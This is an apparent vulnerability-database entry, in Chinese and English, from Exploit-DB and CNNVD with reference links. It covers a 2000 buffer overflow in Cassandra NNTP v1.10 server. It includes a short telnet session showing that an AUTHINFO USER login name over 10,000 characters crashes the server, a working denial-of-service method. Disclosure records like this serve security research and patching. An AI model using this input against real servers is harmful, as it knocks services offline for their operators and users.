https://www.exploit-db.com/exploits/19884
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-003

CassandraNNTP是一个新闻组服务器程序。CassandraNNTP实现上存在一个缓冲区溢出漏洞，远程攻击者可能利用此漏洞对服务器程序进行拒绝服务攻击。CassandraNNTPv1.10server软件在处理登陆信息时没有进行正确的长度检查，当用户输入一个长度超过10000字节的登陆名时，将导致NNTPServer停止响应，直到管理员重新启动此应用程序。

source: http://www.securityfocus.com/bid/1156/info

Unchecked buffer exists in the code that handles login information in Cassandra NNTP v1.10 server. Entering a login name that consists of over 10 000 characters will cause the server to stop responding until the administrator restarts the application.

[host$ telnet target 119
Trying target...
Connected to target.
Escape character is '^]'.
200 CASSANDRA NNTP-Server (v1.10.01 Unregistered) for Windows 95 ready at Mon, 1
May 2000 xx:xx:xx +-300 (posting allowed) 

AUTHINFO USER <10 000 character string>


Where buffer is 10000 characters.

来源:BID
名称:1156
链接:http://www.securityfocus.com/bid/1156
来源:NTBUGTRAQ
名称:20000501RemoteDoSattackinCASSANDRANNTPServerv1.10fromATRIUM
链接:http://marc.theaimsgroup.com/?l=ntbugtraq&m;=95736106504870&w;=2
来源：NSFOCUS
名称：486
链接：http://www.nsfocus.net/vulndb/486